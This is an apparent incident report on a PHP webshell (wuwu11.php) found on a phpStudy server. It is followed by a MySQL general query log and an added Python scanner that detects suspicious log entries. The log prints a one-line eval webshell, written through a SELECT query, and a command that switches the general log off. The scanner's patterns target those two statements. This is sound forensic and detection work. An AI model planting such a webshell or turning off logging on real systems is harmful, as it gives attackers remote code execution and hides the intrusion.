Alibaba Cloud's Yundun (Cloud Shield) reported a backdoor webshell: a new file named wuwu11.php had appeared in the root directory. Its content is:
D:\web\phpStudy\MySQL\bin\mysqld.exe, Version: 5.5.53 (MySQL Community Server (GPL)). started with:
TCP Port: 3306, Named Pipe: MySQL
Time Id Command Argument
65264 Init DB mysql
65264 Query SHOW TABLES FROM `mysql`
65264 Query SHOW TABLE STATUS FROM `mysql`
65264 Query SELECT CURRENT_USER()
65264 Query SELECT `PRIVILEGE_TYPE` FROM `INFORMATION_SCHEMA`.`USER_PRIVILEGES` WHERE GRANTEE='''root''@''127.0.0.1''' AND PRIVILEGE_TYPE='EVENT'
65264 Query SELECT CURRENT_USER()
65264 Query SELECT `PRIVILEGE_TYPE` FROM `INFORMATION_SCHEMA`.`USER_PRIVILEGES` WHERE GRANTEE='''root''@''127.0.0.1''' AND PRIVILEGE_TYPE='TRIGGER'
65264 Quit
180330 19:55:36 65265 Connect root@localhost on
65265 Query SET NAMES 'utf8' COLLATE 'utf8_general_ci'
65265 Init DB mysql
65265 Init DB mysql
65265 Query select '<?php @eval($_POST[h])?>'
65265 Init DB mysql
65265 Query SHOW TABLES FROM `mysql`
65265 Query SHOW TABLE STATUS FROM `mysql`
65265 Query SELECT CURRENT_USER()
65265 Query SELECT `PRIVILEGE_TYPE` FROM `INFORMATION_SCHEMA`.`USER_PRIVILEGES` WHERE GRANTEE='''root''@''127.0.0.1''' AND PRIVILEGE_TYPE='EVENT'
65265 Query SELECT CURRENT_USER()
65265 Query SELECT `PRIVILEGE_TYPE` FROM `INFORMATION_SCHEMA`.`USER_PRIVILEGES` WHERE GRANTEE='''root''@''127.0.0.1''' AND PRIVILEGE_TYPE='TRIGGER'
65265 Query SHOW TABLES
65265 Quit
180330 19:55:37 65266 Connect root@localhost on
65266 Query SET NAMES 'utf8' COLLATE 'utf8_general_ci'
65266 Init DB mysql
65266 Init DB mysql
65266 Query set global general_log = 'Off'
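
The following is an added example, not part of the original post: a Python scanner that flags the two statements visible in the log above (a query carrying a PHP open tag, and a change to `general_log`) in a MySQL general query log. The sample log is constructed from lines in the post; the function name, rule names and regexes are assumptions of this example.

```python
import re

# Constructed sample in the MySQL 5.5 general-log layout, modelled on the post.
SAMPLE_LOG = """\
180330 19:55:36 65265 Connect root@localhost on
65265 Query SET NAMES 'utf8' COLLATE 'utf8_general_ci'
65265 Query select '<?php @eval($_POST[h])?>'
65265 Query SHOW TABLES
65265 Quit
180330 19:55:37 65266 Connect root@localhost on
65266 Query set global general_log = 'Off'
"""

# Optional "YYMMDD HH:MM:SS" timestamp, then thread id, command, argument.
LINE_RE = re.compile(
    r"^(?:(\d{6}\s+\d{1,2}:\d{2}:\d{2})\s+)?(\d+)\s+"
    r"(Connect|Query|Init DB|Quit)\s*(.*)$"
)

# Hypothetical rule names. The second pattern also matches general_log_file.
RULES = [
    ("php_tag_in_query", re.compile(r"<\?(php|=)", re.I)),
    ("general_log_changed", re.compile(r"\bset\s+global\s+general_log", re.I)),
]

def scan_general_log(text):
    """Return one finding per suspicious Query line, with session context."""
    findings, last_ts, accounts = [], None, {}
    for lineno, raw in enumerate(text.splitlines(), 1):
        m = LINE_RE.match(raw.strip())
        if not m:
            continue  # header lines and continuation lines of long queries
        ts, thread, command, arg = m.groups()
        last_ts = ts or last_ts  # the log prints a timestamp only when it changes
        if command == "Connect":
            accounts[thread] = arg.split(" on")[0].strip()
        elif command == "Query":
            for name, pattern in RULES:
                if pattern.search(arg):
                    findings.append({"line": lineno, "time": last_ts,
                                     "thread": thread, "rule": name,
                                     "account": accounts.get(thread),
                                     "query": arg})
    return findings

if __name__ == "__main__":
    for finding in scan_general_log(SAMPLE_LOG):
        print(finding)
```

Each finding carries the connection's account and the most recent timestamp, so it can be matched against web server and phpStudy access logs from the same second.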